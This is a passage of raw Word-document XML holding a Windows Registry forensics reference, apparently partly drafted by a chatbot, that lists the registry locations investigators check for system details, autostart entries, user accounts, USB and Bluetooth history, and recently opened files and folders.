        <w:t>11. Background and Desktop Activity Monitoring (Windows 8 and above)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3174D88B" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Background Activity Moderator (BAM):</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>HKLM</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>\Services\bam\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>UserSettings</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>\{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>SID}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA4177F" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Desktop Activity Monitor (DAM):</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>HKLM</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>\Services\dam\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>UserSettings</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>\{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>SID}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34265C86" w14:textId="77777777" w:rsidR="00A71933" w:rsidRDefault="00A71933" w:rsidP="00A71933"/>
    <w:p w14:paraId="3EB83E0C" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:r w:rsidRPr="00D9654C">
        <w:t xml:space="preserve">Absolutely! Here’s both a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>structured document</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:t xml:space="preserve"> and a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>concise checklist</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:t xml:space="preserve"> for Windows Registry Forensic Analysis based on your data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D312322" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00000000" w:rsidP="00A71933">
      <w:r>
        <w:pict w14:anchorId="39DD6D6A">
          <v:rect id="_x0000_i1075" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="211DA1DA" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Windows Registry Forensic Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D6DB26" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Structured Document</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A20810" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00000000" w:rsidP="00A71933">
      <w:r>
        <w:pict w14:anchorId="7EBB5472">
          <v:rect id="_x0000_i1076" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="241C1DB0" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Account and System Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65ABB48A" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OS Version</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>Registry Path:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0739F68A" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Current Control Set</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>Registry Paths:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>HKLM\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>HKLM\SYSTEM\Select\Current</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>HKLM\SYSTEM\Select\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>LastKnownGood</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="55B3CEE5" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Computer Name</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>Registry Path:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>HKLM\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>\Control\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>ComputerName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>ComputerName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6E14FAF5" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Time Zone Information</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>Registry Path:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>HKLM\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>\Control\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>TimeZoneInformation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="35EC8C0E" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00000000" w:rsidP="00A71933">
      <w:r>
        <w:pict w14:anchorId="73A38A8E">
          <v:rect id="_x0000_i1077" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC5C316" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Network Interfaces and Past Networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DA0035" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:t>Registry Path:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D46A33C" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00000000" w:rsidP="00A71933">
      <w:r>
        <w:pict w14:anchorId="64074E36">
          <v:rect id="_x0000_i1078" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F0EE32" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Programs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEEACE2" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">User-specific </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\RunOnce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316B4733" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">System-wide </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9734FC" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00000000" w:rsidP="00A71933">
      <w:r>
        <w:pict w14:anchorId="07506BBA">
          <v:rect id="_x0000_i1079" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D88FFF" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. User Accounts (SAM Hive)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79190B91" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:t>Registry Path:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>SAM\Domains\Account\Users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DDA319" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00000000" w:rsidP="00A71933">
      <w:r>
        <w:pict w14:anchorId="33416695">
          <v:rect id="_x0000_i1080" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C6E5CC" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. USB Device History</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266ABCA5" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Device Volume Names:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>HKLM\SOFTWARE\Microsoft\Windows\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>PortableDevices</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>\Devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D3D13E" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Device Identification (History):</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>HKLM\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>\Enum\USBSTOR</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>HKLM\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>\Enum\USB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440F266B" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Connection Timestamps:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>Path Template:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR\&lt;Vendor_Product_Version&gt;\&lt;USBSerial#&gt;\Properties\{83da6326-97a6-4088-9453-a19231573b29}</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>Values:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1441AA1F" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="72"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:t>0064 = First connection time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3628132C" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="72"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:t>0066 = Last connection time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A744365" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="72"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:t>0067 = Last removal time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194A4D50" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00000000" w:rsidP="00A71933">
      <w:r>
        <w:pict w14:anchorId="6F093BD1">
          <v:rect id="_x0000_i1081" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5284C4D0" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Bluetooth Devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7F35BB" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:t>Registry Path:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>HKLM\SYSTEM\CurrentControlSet\Services\BTHPORT\Parameters\Devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3D1C6E" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00000000" w:rsidP="00A71933">
      <w:r>
        <w:pict w14:anchorId="5048AB06">
          <v:rect id="_x0000_i1082" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C786519" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. File and Folder Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CB78AD" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recent Files:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E163C8" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Office Recent Files:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>NTUSER.DAT\Software\Microsoft\Office\&lt;VERSION&gt;\UserMRU\LiveID_&lt;UserID&gt;\FileMRU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BDCED1" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ShellBags</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (Folder View History):</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>USRCLASS.DAT\Local Settings\Software\Microsoft\Windows\Shell\Bags</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>USRCLASS.DAT\Local Settings\Software\Microsoft\Windows\Shell\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>BagMRU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>NTUSER.DAT\Software\Microsoft\Windows\Shell\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D9654C">
        <w:t>BagMRU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>NTUSER.DAT\Software\Microsoft\Windows\Shell\Bags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B3F5A1" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00000000" w:rsidP="00A71933">
      <w:r>
        <w:pict w14:anchorId="0ED5E6D1">
          <v:rect id="_x0000_i1083" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E2E2D4" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. Open/Save and Last Visited Dialogs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B24A17A" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00D9654C" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9654C">
        <w:t>Registry Paths:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
        <w:t>NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSavePIDLMRU</w:t>
      </w:r>
      <w:r w:rsidRPr="00D9654C">
        <w:br/>
